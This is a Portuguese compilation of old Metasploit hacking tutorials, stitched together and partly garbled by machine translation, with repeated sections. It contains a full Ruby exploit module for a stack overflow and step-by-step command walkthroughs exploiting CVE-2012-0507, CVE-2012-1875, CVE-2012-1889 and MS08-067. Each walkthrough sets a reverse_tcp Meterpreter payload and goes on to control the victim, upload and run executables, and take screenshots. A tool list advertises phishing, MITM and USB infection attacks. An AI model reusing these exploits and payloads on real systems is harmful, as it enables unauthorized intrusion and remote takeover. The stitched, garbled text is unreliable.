Adicionando exploit ao metasploit
Adicionando Exploit ao MSF
Para adicionarmos um exploit ao metasploit, primeiramente devemos ter em mente as seguintes perguntas, por motivos de organização:O que estou adicionando? Para qual sistema operacional ele é útil? O que ele
explora?
Entendeu mais ou menos?
Vou explicar. Vamos para o diretório padrão do msf, para isso digite:
root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# ls
HACKING documentation lib msfcli msfelfscan msfmachscan msfpescan msfweb test
README erros.txt lista.txt msfconsole msfencode msfopcode msfrpc plugins tools
data external modules msfd msfgui msfpayload msfrpcd scripts root@bt:/pentest/exploits/framework3#
Estamos no diretório padrão do msf (Na verdade o diretório padrão fica em
/opt/metasploit3/msf3/, este diretório é apenas um link simbólico.).
Agora entre no diretório modules:
root@bt:/pentest/exploits/framework3# cd modules/
Agora em exploits. (O que estou adicionando?)root@bt:/pentest/exploits/framework3/modules# cd exploits/
Em windows. (Para qual sistema operacional ele é útil?)root@bt:/pentest/exploits/framework3/modules/exploits# cd windows/
E por fim em misc. (O que ele explora?)
root@bt:/pentest/exploits/framework3/modules/exploits/windows# cd misc/
Ok, agora vamos adicionar nosso exploit neste diretório que estamos. Vamos dar o nome de "exploit_stackoverflow.rb". A extensão ".rb" significa que o exploit foi desenvolvido na linguagem Ruby. Utilizarei o nano, mais utilize o editor de suapreferência.
root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# nano
exploit_stackoverflow.rb
Agora insira o exploit abaixo:
http://pastebin.com/raw.php?i=H26uL5ih
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Peter Van Eeckhoutte' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP3 En',
{ 'Ret' => 0x7c874413, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,
'Privileged' => false
))
register_options(
[
Opt::RPORT(200)
], self.class)
end
def exploit
connect
junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end
Créditos do exploit para: “Peter Van Eeckhoutte”
Salve com "Ctrl + X", informe que quer salvar pressionando Y e ENTER.
Ok, se ocorreu tudo certo aqui, basta abrirmos o msfconsole e ver nosso exploit recém adicionado.
root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc#msfconsole
Agora vamos procurar pelo exploit "exploit_stackoverflow", para isso digitamos o comando search. (Óbvio não?). Veja na figura abaixo.
--------------------------------------------------------------------------------------------------------------------------------------
WebSploit é um projeto Open Source para: Obras de engenharia social, Web Scan, esteiras e Análise, Exploiter automática, ataques de rede de apoio ..
[+] Autopwn - Usado De Metasploit para verificação e Exploit Serviço de Destino
[+] WMAP - Scan, Crawler alvo usado De Metasploit WMAP Plugin
[+] infector formato - injetar reversa e carga se ligam em formato de arquivo
[+] Scanner phpmyadmin
[+] LFI Bypasser
[+] Apache Scanner Usuários
[+] Dir Bruter
[+] administrador localizador
[+] MLITM Ataque - Homem esquerda no meio, XSS Ataques de phishing
[+] MITM - Man In The Middle Ataque
[+] Ataque Applet Java
[+] Ataque MFOD Vector
[+] USB Infecção Ataque
[+] ARP ataque DoS
[+] Ataque do assassino Web
[+] Ataque Atualização Falso
[+] Ataque Falso ponto de acesso
Link: Aqui ou http://sourceforge.net/projects/websploit/files/latest/download?source=directory
WebSploit Framework
WebSploit é um projeto Open Source para: Obras de engenharia social, Web Scan, esteiras e Análise, Exploiter automática, ataques de rede de apoio ..
[+] Autopwn - Usado De Metasploit para verificação e Exploit Serviço de Destino
[+] WMAP - Scan, Crawler alvo usado De Metasploit WMAP Plugin
[+] infector formato - injetar reversa e carga se ligam em formato de arquivo
[+] Scanner phpmyadmin
[+] LFI Bypasser
[+] Apache Scanner Usuários
[+] Dir Bruter
[+] administrador localizador
[+] MLITM Ataque - Homem esquerda no meio, XSS Ataques de phishing
[+] MITM - Man In The Middle Ataque
[+] Ataque Applet Java
[+] Ataque MFOD Vector
[+] USB Infecção Ataque
[+] ARP ataque DoS
[+] Ataque do assassino Web
[+] Ataque Atualização Falso
[+] Ataque Falso ponto de acesso
Link: Aqui ou http://sourceforge.net/projects/websploit/files/latest/download?source=directory
--------------------------------------------------------------------------------------------------------------------------------------
Metasploit SIP Penetration Testing Modules :: Tools
SIP biblioteca para Metasploit é desenvolvido para ajudar a SIP Testsing Penetração. Ele oferece recurso de autenticação que ajuda a criar testes simples. Ele inclui cinco módulos diferentes, com suporte de autenticação: testador de opções, Forcer bruta, enumerador, convidam testador e testador de inscrição. Todos os ataques poderiam realizar antes e após a autenticação de fuzz SIP serviços e serviços de valor acrescentado.
Link: Aqui ou packetstormsecurity.com/files/download/120053/sipmodules.zip
Link: Aqui ou packetstormsecurity.com/files/download/120053/sipmodules.zip
Como cortar computador remoto usando Metasploit? Explorando vulnerabilidade Java
Sempre que alguém diz PenTesting ferramenta, a primeira coisa que vem em nossa mente é Metasploit. Hoje, eu estou indo para demonstrar como utilizar a ferramenta Metasploit para explorar o popular java AtomicReferenceArray vulnerabilidade Violação Tipo (CVE-2012-0507).
Quadro dominar o: Um curso livre de Offensive-Security A equipe de segurança ofensiva, juntamente com vários membros ativos da comunidade, fez um curso gratuito sobre o "Dominando o quadro" Metasploit Framework. O curso abrange coleta de informações, ataques de engenharia social, explorar o desenvolvimento, evitar Avanço AV e etc .. O curso está disponível aqui ou www.offensive-security.com/metasploit-unleashed/IntroductionSobre o Metasploit :Metsploit é uma ferramenta muito poderosa PenTesting. Metasploit Framework, uma ferramenta para o desenvolvimento e execução de código de exploração contra uma máquina de destino remoto. O Metasploit Project também é conhecido por ferramentas anti-forenses e evasão, alguns dos quais são construídos no Metasploit Framework. Ferramenta muito útil para coleta de informações, análise de vulnerabilidade, Desenvolvimento Exploit, exploits lado do cliente, ...
Ei, onde você vai?! Espere um pouco, tomar esse curso Uma vez que eu demonstrar como utilizar o Metasploit. Porque, vai ser difícil de entender ou chato, se você ler essas coisas diretamente. Requisitos:
- VirtualBox
- Alvo OS (janelas, ...)
- Distro PenTesting (Backtrack)
- JRE 6 (versão sem patch)
CVE-2012-0507 é uma vulnerabilidade no JRE, devido ao fato de que a implementação da classe AtomicReferenceArray não verificar corretamente se a matriz é de um objeto esperado [tipo]. Um aplicativo Java malicioso ou applet poderia usar esta falha para causar Java Virtual Machine (JVM) para travar ou ignorar as restrições de Java sandbox.
Notícias sobre segurança: Essa vulnerabilidade afeta o Windows, Mac e Linux. No mês passado, malware Flashback infectar mais de 600 mil computadores Mac , explorando essa vulnerabilidade. Recentemente, o INSS , The Amnesty International UK sites injetado com código malicioso, que exploram a CVE-2012-0507.Eu estou indo para demonstrar esta vulnerabilidade com o VirtualBox. Eu tenho a configuração duas máquinas virtuais ou seja, "Destino" e "BT5". Eu instalei o XP 2 no Target e R2 Backtrack 5 no 'BT5'. (? Precisam de ajuda para configurar o VM, leia isto: Laboratório de configuração PenTesting ).
Parte I: Preparando o computador de destino:
Inicie o "alvo" da máquina. Instalar o JRE 6.
Parte II: Preparação da máquina PenTesting:
Agora, começar a BT5. Abra o terminal e digite "msfupdate". Isto irá atualizar o Metasploit Framework (MSF) com as últimas façanhas e cargas úteis. Como CVE-2012-0507 é o mais recente vulnerabilidade, você tem que atualizar o MSF antes de prosseguir. conexão lenta de Internet?! Se você tem conexão de internet lenta, então você pode baixar o módulo java_atomicreferencearray sozinho em vez de atualizar todos os módulos. Faça o download do java_atomicreferencearray.rb e colar nesta pasta "opt/metasploit/msf3/modules/exploits/multi/browser / /" Então, Download CVE-2012-0507.jar e cole nesta pasta "/ opt/metasploit/msf3/data/exploits /"
Parte III:
Etapa 1: Abra o Terminal e "msfconsole" tipo. Isto irá trazer o console Metasploit, aqui você pode interagir com o MSF. Etapa 2: Tipo "use exploit / multi / browser / java_atomicreferencearray". Este comando irá usar o módulo java_atomicreferencearray.rb para o ataque. Explorando o Java AtomicReferenceArray Vulnerabilidade Violação Tipo:
Agora digite "mostrar opções" para mostrar as configurações que estão disponíveis e / ou necessários para este módulo específico.
Agora digite "definir SRVPORT 80". e "definir URIPATH /".
Passo 3: Carga Set Tipo "cargas Show", essa vontade exibe a lista de cargas. Nós vamos usar o 'reverse_tcp' payload. Esta carga terá conexão TCP inversa do alvo para PenTesting máquina. Tipo 'set carga java / Meterpreter / reverse_tcp' no console.
definir LHOST [IP_address]: A fim de obter conexão reversa, nós temos que definir o nosso IP no LHOST. Abra o terminal e "ifconfig" tipo. Isto irá exibir a informação de IP da nossa máquina PenTesting. O IP será "192.168.56.x". Por exemplo, deixe-me dizer o ip é 192.168.56.10. Agora Digite o msfconsole como "conjunto LHOST 192.168.56.10".
Parte IV: Rompendo a máquina de destino:
Então, você está pronto?! Vamos invadir o computador de destino. Etapa 1:
Digite "exploit" no msfconsole. Isto irá iniciar o manipulador inversa à nossa máquina e que vai esperar alguém que vai ligar para o servidor HTTP nosso (Ex: http://192.168.56.10). Uma vez vítima ligar para o nosso servidor, ele irá enviar um frasco que vai explorar a vulnerabilidade CVE-2012-0507. passo 2: Abra o Firefox / IE na máquina de destino. Digite "http://192.168.56.10". Ele carrega nada, mas exploit será executado em segundo plano.
Etapa 3: Abrir a máquina BT5, ele irá exibir o seguinte resultado:
Agora digite "sessões", isto irá mostrar a lista de sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Meterpreter vai ajudar você a interagir / controlar com o Target.
Passo 4: upload de arquivos Yeeeh ..! temos backdoor na máquina de destino, agora podemos executar comandos no alvo.
Por exemplo, digitando "sysinfo 'irá exibir as informações do sistema.
Você também pode carregar e executar seus próprios arquivos executáveis na máquina de destino. 'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo. 'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.
Dicas de Segurança:
Atualize seu JRE para a versão mais recente.
conclusão:
Espero que este artigo lhe deu uma boa visão como usar Metasploit Framework para explorar a vulnerabilidade Java. Espero que isso irá ajudá-lo a entrar no mundo PenTesting ..!
windows Hacking usando MS12-037 Internet Explorer Vulnerabilidade mesmo ID
MS12-037 Internet Explorer Vulnerabilidade mesmo ID Microsoft Internet Explorer
8 não tratar adequadamente os objetos na memória, o que permite que
atacantes remotos para executar código arbitrário, acessando um excluído
objeto, também conhecido como "O mesmo ID propriedade Vulnerabilidade de execução remota de código."
Duas tecnologias no sistema operacional moderno são usados para fazer
façanhas desse tipo ainda mais difícil: DEP (Data Execution Prevention)
e ASLR (address-space randomização layout). DEP se destina a impedir que um aplicativo ou serviço de execução de código a partir de uma região da memória não-executável. Isso ajuda a evitar que certas façanhas código da loja através de um estouro de buffer. ( wiki ) ASLR carrega módulos de software, tais como DLLs na memória em locais aleatórios.
Movendo DLLs do sistema em torno torna mais difícil para hackers para
adivinhar onde encontrar as funções de biblioteca que necessitam, como
URLDownloadToFile () e CreateProcess (). Mas DEP e ASLR não fazem execução remota de código ataca impossível, apenas mais complicado.
No caso da CVE-2012-1875, ASLR pode ser ignorada por tentar forçar o
Internet Explorer para localizar e carregar uma versão antiga do
Microsoft C Runtime DLL - um que foi compilado antes ASLR se tornar a
norma, e portanto, não o suporta. Sempre que você carregar uma DLL não ASLR, mesmo em um programa de ASLR habilitada, você pode prever onde isso vai acabar. E DEP é contornado usando uma técnica conhecida como ROP, ou retorno de programação orientada.
Requisitos:
Ok, vamos lançar o exploit. Digite "proeza" no console.
Agora, o exploit é iniciado. Nossa exploração está funcionando em "http://192.168.56.10:8080/". Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:
Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Agora, você pode controlar o sistema vítima de computador usando Meterpreter. Por exemplo: 'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo. 'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.
Exploit para a vulnerabilidade do Internet Explorer mesmo ID (CVE-2012-1875):
Requisitos:
- Alvo OS: XP3
- Atacante OS: Backtrack ou qualquer PenTesting Distros
definir payload windows / Meterpreter / reverse_tcp
Ok, vamos lançar o exploit. Digite "proeza" no console.
Agora, o exploit é iniciado. Nossa exploração está funcionando em "http://192.168.56.10:8080/". Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:
[*] Cliente requerente: / [*] Usando o JRE ROP [*] Enviando html [*] Envio de estágio (752.128 bytes) para 192.168.56.12 [*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1685)
Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Agora, você pode controlar o sistema vítima de computador usando Meterpreter. Por exemplo: 'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo. 'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.
Microsoft XML Core Services Vulnerabilidade Metasploit Demonstração
CVE-2012-1889: Microsoft XML Core Services Vulnerabilidade
Uma vulnerabilidade no Microsoft XML Core Services 3.0, 4.0, 5.0 e 6.0
permite a execução remota de código se um usuário visualiza uma página web especialmente criada usando o Internet Explorer. Um invasor não teria como forçar os usuários a visitar um site deste tipo.
Em vez disso, o invasor teria que convencer os usuários a visitar o
site, geralmente fazendo com que eles cliquem em um link em uma mensagem
de e-mail ou mensagens instantâneas, que os leva para o site do
atacante. A vulnerabilidade afeta todas as versões suportadas do Microsoft Windows, e todas as edições com suporte do Microsoft Office 2003 e Microsoft Office 2007. Aqui você pode a lista completa.
Digite "proeza" no console.
Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit: [*] Msxml_get_definition_code_exec - Usando msvcrt ROP [*] Msxml_get_definition_code_exec - 10.0.1.79:1564 - Enviando html [*] Envio de estágio (752.128 bytes) para 192.168.56.12 [*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1565) Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Digite "sysinfo" no Meterpreter para obter as informações do sistema.
A vulnerabilidade existe quando MSXML tenta acessar um objeto na memória que não foi inicializado, o que pode corromper a memória de tal maneira que um invasor executar um código arbitrário no contexto do usuário conectado.Vou demonstrar como usar a ferramenta Metasploit para testar se sua rede vulnerável ou não. Abra o Terminal e digite "msfupdate" para obter as últimas módulos Metasploit. Quando a atualização for concluída, em seguida, digite "msfconsole". Em seguida, digite o seguinte comando no console "uso explorar / windows / navegador / msxml_get_definition_code_exec". Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console. Comando: SRVHOST conjunto 192.168.56.10 Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal. Comando: lhost conjunto 192.168.56.10 Comando: URIPATH set / Detalhes: O caminho em que a nossa exploração será executado. Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp
Digite "proeza" no console.
Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit: [*] Msxml_get_definition_code_exec - Usando msvcrt ROP [*] Msxml_get_definition_code_exec - 10.0.1.79:1564 - Enviando html [*] Envio de estágio (752.128 bytes) para 192.168.56.12 [*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1565) Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Digite "sysinfo" no Meterpreter para obter as informações do sistema.
[Metasploit Tutorial] Hacking Windows XP usando o endereço IP
Você acha que é possível cortar algum computador com um apenas um endereço de ip?! A resposta é sim, se você está usando sem correções (vulnerável) OS. Se você não acredita em mim, então leia o artigo completo.
Neste artigo eu estou indo para demonstrar como hackear um computador
remoto, explorando a falha de análise no código canonização caminho da
Netapi32.dll através do Serviço de Servidor ( CVE-2008-4250 ).
Antes de saltar para o processo de exploração real, deixe-me dar mais
detalhes sobre esta vulnerabilidade no serviço de Servidor. Detalhes sobre Vulnerabilidade Server Service (MS08-067):
Serviço Microsoft Windows Server fornece suporte para compartilhamento
de recursos, como arquivos e serviços de impressão através da rede. O serviço do servidor é vulnerável a uma vulnerabilidade de execução de código remoto.
A vulnerabilidade é causada devido a um erro no processamento de
sequências quando netapi32.dll diretório caráter de travessia em nomes
de caminho.
Isto pode ser explorado para corromper a memória pilha por exemplo o
envio de solicitações RPC contendo nomes de caminho especialmente
criadas para o componente de serviço do servidor. O 'NetprPathCanonicalize ()' função no arquivo 'netapi32.dll' é afetado. Um pedido malicioso para os resultados sistema vulnerável compromisso completa de computadores vulneráveis. Essa vulnerabilidade afeta o Windows XP, Windows 2000, Windows Server 2003, Windows Vista e Windows Server 2008. Mas Atacantes requerem acesso autenticado no Windows Vista e Server 2008 plataformas para explorar esta questão. Explorando o MS08-067 usando Metasploit: Requisitos:
- VirtualBox
- Backtrack 5
- Alvo OS (XP)
Etapa 1: Criar duas máquina virtual (VM), nomeadamente "Target" e "BT5". Instalar o XP dentro Alvo VM e Backtrack dentro BT5. Inicie os dois VMs. Se você não sabe como criar máquinas virtuais, então por favor leia este manual VirtualBox . Passo 2: Encontrar o endereço IP de destino Abra o prompt de comando na máquina de destino (XP). Digite "ipconfig" para encontrar o endereço IP do sistema Target.
Passo 3: Coleta de Informações Agora vamos coletar algumas informações sobre a máquina de destino. Para este fim, vamos usar a ferramenta nmap. Abra o terminal na máquina BT5 (Backtrack) e digite "nmap-O 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino. Se você olhar para o resultado, você pode encontrar a lista de portas abertas e versão OS.
Passo 4: Metasploit Agora, abra o Terminal na máquina BT5 (Backtrack) e digite "msfconsole". O msfconsole é a interface mais popular para o Metasploit Framework. Ele fornece um "tudo-em-um" console centralizado e permite acesso eficiente a praticamente todas as opções disponíveis no Metasploit Framework. Vamos usar o comando de busca para encontrar os módulos de exploração com a NetAPI palavra-chave. Tipo "busca netap i". Agora você pode ver a lista de módulos de combinar com o NetAPI.
Nós vamos explorar MS08-067, assim tipo "uso exploit/windows/smb/ms08_067_netapi". Passo 5: Carga Set Como de costume, vamos usar a carga TCP reverso para esta façanha também. Tipo "set payload windows / Meterpreter / reverse_tcp" no msfconsole. Passo 6: Opções Tipo "definir LHOST 192.168.56.10". Aqui 192.168.56.10 é o endereço IP da máquina Backtrack. Você pode encontrar o endereço de ip pelo comando 'ifconfig' digitação no Terminal. Tipo "definir rhost 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino.
Passo 7: Explorando Ok, é hora de explorar a vulnerabilidade, "proeza" tipo no console. Se a exploração for bem sucedido, você pode ver o seguinte resultado.
Agora podemos controlar o computador remoto usando o Meterpreter. Por exemplo, digitando "screenshot" vai pegar a imagem do sistema da vítima.
Hackers usam métodos diferentes para encontrar o endereço IP da vítima. Para por exemplo., Enviando link que irá obter os detalhes ip ou usar o Angry IP Scanner.
Passo 3: Coleta de Informações Agora vamos coletar algumas informações sobre a máquina de destino. Para este fim, vamos usar a ferramenta nmap. Abra o terminal na máquina BT5 (Backtrack) e digite "nmap-O 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino. Se você olhar para o resultado, você pode encontrar a lista de portas abertas e versão OS.
Passo 4: Metasploit Agora, abra o Terminal na máquina BT5 (Backtrack) e digite "msfconsole". O msfconsole é a interface mais popular para o Metasploit Framework. Ele fornece um "tudo-em-um" console centralizado e permite acesso eficiente a praticamente todas as opções disponíveis no Metasploit Framework. Vamos usar o comando de busca para encontrar os módulos de exploração com a NetAPI palavra-chave. Tipo "busca netap i". Agora você pode ver a lista de módulos de combinar com o NetAPI.
Nós vamos explorar MS08-067, assim tipo "uso exploit/windows/smb/ms08_067_netapi". Passo 5: Carga Set Como de costume, vamos usar a carga TCP reverso para esta façanha também. Tipo "set payload windows / Meterpreter / reverse_tcp" no msfconsole. Passo 6: Opções Tipo "definir LHOST 192.168.56.10". Aqui 192.168.56.10 é o endereço IP da máquina Backtrack. Você pode encontrar o endereço de ip pelo comando 'ifconfig' digitação no Terminal. Tipo "definir rhost 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino.
Passo 7: Explorando Ok, é hora de explorar a vulnerabilidade, "proeza" tipo no console. Se a exploração for bem sucedido, você pode ver o seguinte resultado.
Agora podemos controlar o computador remoto usando o Meterpreter. Por exemplo, digitando "screenshot" vai pegar a imagem do sistema da vítima.
---------------------------------------------------------------------------------------------------------------------------------------------------------------
Metasploit Exploiting
acesso
a uma máquina (virtual) e assim poder testar e estudar todas suas
funcionalidades, ficando cada dia mais "afiado" em seus testes de
intrusão. Sim, este artigo é bem básico.
O cenário utilizado foi o seguinte:
Linux: Intrusão Simples com Metasploit
Neste caso são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs estão configuradas como bridge.
1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.
2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.
Quer saber mais sobre Virtualbox? Digite "virtualbox" no campo de pesquisa aqui do VOL que encontrará ótimos artigos/dicas sobre o mesmo.
Scanning com Nmap e Metasploit
Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.
Abra um terminal no micro com o Backtrack e digite o seguinte comando:
# nmap -v --script=smb-check-vulns 192.168.0.0/24
-v = Modo Verbose
--script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
192.168.0.0/24 = Range de IP utilizado em minha rede local.
Se repararem, no host com endereço IP 192.168.0.186, verá que são mostradas as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.
Certo, descobrimos um host dentro da nossa LAN que está possivelmente vulnerável ao nosso ataque pretendido! Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...
Obtemos nosso console do msf. Dei uma personalizada na saída. :-)
Feito isto, vamos efetuar a intrusão na máquina. Os comandos são os seguintes:
use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
exploit #E finalmente executamos nosso exploit.
Observem a imagem abaixo.
Pronto! Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.
Linux: Intrusão Simples com Metasploit
Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit. Opções Metasploit
Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do sistema operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.
Como vimos através do script do nmap que nosso alvo é vulnerável, nós podemos realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.
Certo, mas como? Vamos utilizar um módulo auxiliar presente no Metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.
Executaremos os seguintes comandos no console do msf:
use auxiliary/scanner/smb/smb_version #Falamos que queremos utilizar o scanner smb_version.
set RHOSTS 192.168.0.186 #Aqui eu setei um único host (192.168.0.186), mas poderia especificar um range, exemplo, 192.168.0.0/24.
run #Comando para executar nosso scanner.

Linux: Intrusão Simples com Metasploit
Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção set TARGET.
use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
set TARGET 31 #Aqui eu digo que o alvo usa
exploit #E finalmente executamos nosso exploit.
Na imagem abaixo,com o comando show targets são listados todos os S.O.s vulneráveis a este exploit (ms08_067).

Veja abaixo que iremos utilizar a opção 31.

Veja o ataque agora.

Veja que não foi realizada a etapa de fingerprint com o alvo, pois "falamos" para o exploit o S.O. que ele encontrará em seu destino.
Ok! Finish! The end! Heheheh
Ah!

É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit.
--------------------------------------------------------------------------------------------------------------------------------------O cenário utilizado foi o seguinte:
Linux: Intrusão Simples com Metasploit
Neste caso são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs estão configuradas como bridge.
1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.
2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.
Quer saber mais sobre Virtualbox? Digite "virtualbox" no campo de pesquisa aqui do VOL que encontrará ótimos artigos/dicas sobre o mesmo.
Scanning com Nmap e Metasploit
Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.
Abra um terminal no micro com o Backtrack e digite o seguinte comando:
# nmap -v --script=smb-check-vulns 192.168.0.0/24
-v = Modo Verbose
--script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
192.168.0.0/24 = Range de IP utilizado em minha rede local.
Se repararem, no host com endereço IP 192.168.0.186, verá que são mostradas as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.
Certo, descobrimos um host dentro da nossa LAN que está possivelmente vulnerável ao nosso ataque pretendido! Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...
Obtemos nosso console do msf. Dei uma personalizada na saída. :-)
Feito isto, vamos efetuar a intrusão na máquina. Os comandos são os seguintes:
use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
exploit #E finalmente executamos nosso exploit.
Observem a imagem abaixo.
Pronto! Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.
Linux: Intrusão Simples com Metasploit
Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit. Opções Metasploit
Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do sistema operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.
Como vimos através do script do nmap que nosso alvo é vulnerável, nós podemos realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.
Certo, mas como? Vamos utilizar um módulo auxiliar presente no Metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.
Executaremos os seguintes comandos no console do msf:
use auxiliary/scanner/smb/smb_version #Falamos que queremos utilizar o scanner smb_version.
set RHOSTS 192.168.0.186 #Aqui eu setei um único host (192.168.0.186), mas poderia especificar um range, exemplo, 192.168.0.0/24.
run #Comando para executar nosso scanner.
Linux: Intrusão Simples com Metasploit
Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção set TARGET.
use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
set TARGET 31 #Aqui eu digo que o alvo usa
exploit #E finalmente executamos nosso exploit.
Na imagem abaixo,com o comando show targets são listados todos os S.O.s vulneráveis a este exploit (ms08_067).
Veja abaixo que iremos utilizar a opção 31.
Veja o ataque agora.
Veja que não foi realizada a etapa de fingerprint com o alvo, pois "falamos" para o exploit o S.O. que ele encontrará em seu destino.
Ok! Finish! The end! Heheheh
Ah!
